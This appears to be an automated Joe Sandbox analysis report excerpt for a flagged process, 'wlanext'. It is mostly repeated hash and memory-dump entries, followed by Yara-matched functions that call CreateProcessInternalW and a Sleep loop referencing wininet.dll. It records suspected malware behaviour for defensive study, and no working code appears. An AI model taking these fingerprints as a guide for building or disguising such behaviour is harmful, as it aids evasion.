                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                Function 020407AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                Function 0203FAB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                Function 0203FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                Function 0203FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                Function 0203FB50 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                Function 0203FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                Function 0203FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                Function 0203F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                Function 0203F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                Function 0203FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                Function 0203FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                Function 0203FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                Function 0203FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                Function 0203FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                Function 0009A686 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66memoryprocessCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 406 9a686-9a68d 408 9a61d-9a624 406->408 409 9a68f 406->409 410 9a62c-9a641 RtlAllocateHeap 408->410 411 9a627 call 9af40 408->411 412 9a691-9a6bc call 9af40 409->412 413 9a6e6-9a718 CreateProcessInternalW 409->413 411->410
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(6E,?,00094CAF,00094CAF,?,00094536,?,?,?,?,?,00000000,00000000,?), ref: 0009A63D
                                                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A714
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateCreateHeapInternalProcess
                                                                                • String ID: 6E
                                                                                • API String ID: 2739015735-729105364
                                                                                • Opcode ID: f1c76b8c9b51d45af59870079f925de7ed7b6537846d94279eefc950541dc4dd
                                                                                • Instruction ID: 0772048f83d13651d1945f92ae75af6cfb1714f452235513cf0e20fd4b9dae27
                                                                                • Opcode Fuzzy Hash: f1c76b8c9b51d45af59870079f925de7ed7b6537846d94279eefc950541dc4dd
                                                                                • Instruction Fuzzy Hash: 81116AB6204208AFCB14DFA8DC81DEB77A8EF8C314B148659F95D97242C631E911CBF1
                                                                                Function 00099060 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 417 99060-9908f 418 9909b-990a2 417->418 419 99096 call 9bd20 417->419 420 990a8-990f8 call 9bdf0 call 8acf0 call 94e50 418->420 421 9917c-99182 418->421 419->418 428 99100-99111 Sleep 420->428 429 99113-99119 428->429 430 99176-9917a 428->430 431 9911b-99141 call 98c80 429->431 432 99143-99163 429->432 430->421 430->428 434 99169-9916c 431->434 432->434 435 99164 call 98e90 432->435 434->430 435->434
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00099108
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: net.dll$wininet.dll
                                                                                • API String ID: 3472027048-1269752229
                                                                                • Opcode ID: ab2876aee57ca8f87c977d3cbf0828a4e659f73cd1673fd586bbfcee6c11f3d9
                                                                                • Instruction ID: df6d1199d946e6e85f39dd63d41ecbbbd6532335d2496bee0e3ac4d9c094c523
                                                                                • Opcode Fuzzy Hash: ab2876aee57ca8f87c977d3cbf0828a4e659f73cd1673fd586bbfcee6c11f3d9
                                                                                • Instruction Fuzzy Hash: 613186B2500745BBCB24DF68D885FA7B7F8BB48B00F10811DF62A9B246D670A550DBA4
                                                                                Function 0009905C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 78sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
